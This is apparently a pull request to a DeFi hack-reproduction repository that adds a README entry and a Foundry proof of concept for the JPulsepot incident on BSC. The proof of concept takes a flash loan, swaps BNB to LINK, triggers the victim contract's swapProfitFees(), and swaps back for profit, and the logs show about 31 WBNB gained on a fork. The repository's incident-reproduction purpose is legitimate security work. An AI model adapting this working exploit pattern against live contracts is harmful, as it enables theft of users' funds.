### PR TITLE
feat: add JPulsepot attack incident

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,7 +2,7 @@
 
 **Reproduce DeFi hack incidents using Foundry.**
 
-548 incidents included.
+549 incidents included.
 
 Let's make Web3 secure! Join [Discord](https://discord.gg/Fjyngakf3h)
 
@@ -48,6 +48,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+
 [20250110 JPulsepot](#20250110-jpulsepot---logic-flaw)
 
 [20250108 LPMine](#20250108-LPMine---Incorrect-reward-calculation)
@@ -1183,9 +1184,6 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ---
 
 ### List of DeFi Hacks & POCs
-
-
-
 
 ### 20250110 JPulsepot - Logic Flaw
 

--- a/README.md
+++ b/README.md
@@ -48,6 +48,7 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 - [Giveth](https://giveth.io/donate/defihacklabs)
 
 ## List of Past DeFi Incidents
+[20250110 JPulsepot](#20250110-jpulsepot---logic-flaw)
 
 [20250108 LPMine](#20250108-LPMine---Incorrect-reward-calculation)
 
@@ -1182,6 +1183,25 @@ If you appreciate our work, please consider donating. Even a small amount helps 
 ---
 
 ### List of DeFi Hacks & POCs
+
+
+
+
+### 20250110 JPulsepot - Logic Flaw
+
+### Lost: 21.5K
+
+
+```sh
+forge test --contracts ./src/test/2025-01/JPulsepot_exp.sol -vvv --evm-version shanghai
+```
+#### Contract
+[JPulsepot_exp.sol](src/test/2025-01/JPulsepot_exp.sol)
+### Link reference
+
+https://x.com/CertiKAlert/status/1877662352834793639
+
+---
 
 ### 20250108 LPMine - Incorrect reward calculation 
 

--- a/src/test/2025-01/JPulsepot_exp.sol
+++ b/src/test/2025-01/JPulsepot_exp.sol
@@ -35,7 +35,7 @@ contract JPulsepot is BaseTestWithBalanceLog {
     function setUp() public {
         vm.createSelectFork("bsc", blocknumToForkFrom);
         //Change this to the target token to get token balance of,Keep it address 0 if its ETH that is gotten at the end of the exploit
-        fundingToken = address(0);
+        fundingToken = address(BNB);
     }
 
     function testExploit() public balanceLog {

--- a/src/test/2025-01/JPulsepot_exp.sol
+++ b/src/test/2025-01/JPulsepot_exp.sol
@@ -1,0 +1,76 @@
+// SPDX-License-Identifier: UNLICENSED
+pragma solidity ^0.8.15;
+
+import "../basetest.sol";
+
+// @KeyInfo - Total Lost : 21.5K
+// Attacker : https://bscscan.com/address/0xf1e73123594cb0f3655d40e4dd6bde41fa8806e8
+// Attack Contract : https://bscscan.com/address/0xe40ab156440804c3404bb80cbb6b47dddd3abfd7
+// Vulnerable Contract : https://bscscan.com/address/0x384b9fb6e42dab87f3023d87ea1575499a69998e
+// Attack Tx : https://bscscan.com/tx/0xd6ba15ecf3df9aaae37450df8f79233267af41535793ee1f69c565b50e28f7da
+
+// @Info
+// Vulnerable Contract Code : https://bscscan.com/address/0x384b9fb6e42dab87f3023d87ea1575499a69998e#code
+
+// @Analysis
+// Post-mortem : 
+// Twitter Guy : https://x.com/CertiKAlert/status/1877662352834793639
+// Hacking God : 
+pragma solidity ^0.8.0;
+
+import "../interface.sol";
+
+interface IFortuneWheel {
+    function swapProfitFees() external;
+}
+
+contract JPulsepot is BaseTestWithBalanceLog {
+    uint256 blocknumToForkFrom = 45_640_245;
+    address internal constant PancakeV3Pool = 0x172fcD41E0913e95784454622d1c3724f546f849;
+    address internal constant BNB = 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c;
+    address internal constant PancakeV2Router = 0x10ED43C718714eb63d5aA57B78B54704E256024E;
+    address internal constant LINK = 0xF8A0BF9cF54Bb92F17374d9e9A321E6a111a51bD;
+    address internal constant victim = 0x384b9fb6E42dab87F3023D87ea1575499A69998E;
+
+    function setUp() public {
+        vm.createSelectFork("bsc", blocknumToForkFrom);
+        //Change this to the target token to get token balance of,Keep it address 0 if its ETH that is gotten at the end of the exploit
+        fundingToken = address(0);
+    }
+
+    function testExploit() public balanceLog {
+        //implement exploit code here
+        address recipient = address(this);
+        uint256 amount0 = 0;
+        uint256 amount1 = 4_300_000_000_000_000_000_000;
+        bytes memory data = abi.encode(amount1);
+        IPancakeV3Pool(PancakeV3Pool).flash(recipient, amount0, amount1, data);
+    }
+
+    function pancakeV3FlashCallback(uint256 fee0, uint256 fee1, bytes memory data) external {
+        uint256 amount = abi.decode(data, (uint256));
+
+        IERC20(BNB).approve(PancakeV2Router, type(uint256).max);
+
+        uint256 amountIn = amount;
+        uint256 amonutOutMin = 0;
+        address[] memory path = new address[](2);
+        path[0] = BNB;
+        path[1] = LINK;
+        address recipient = address(this);
+        uint256 deadline = block.timestamp;
+        IUniswapV2Router(payable(PancakeV2Router)).swapExactTokensForTokensSupportingFeeOnTransferTokens(amountIn, amonutOutMin, path, recipient, deadline);
+        
+        IFortuneWheel(victim).swapProfitFees();
+
+        IERC20(LINK).approve(PancakeV2Router, type(uint256).max);
+
+        amountIn = IERC20(LINK).balanceOf(address(this));
+        path[0] = LINK;
+        path[1] = BNB;
+        IUniswapV2Router(payable(PancakeV2Router)).swapExactTokensForTokensSupportingFeeOnTransferTokens(amountIn, 0, path, recipient, deadline);
+        IERC20(BNB).transfer(msg.sender, amount+fee1);
+    }
+
+    receive() external payable {}
+}


### PR DESCRIPTION
```
[PASS] testExploit() (gas: 724506)
Logs:
  Attacker WBNB Balance Before exploit: 0.000000000000000000
  Attacker WBNB Balance After exploit: 30.968120414037532669

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.74s (782.35ms CPU time)

Ran 2 test suites in 1.75s (2.64s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
```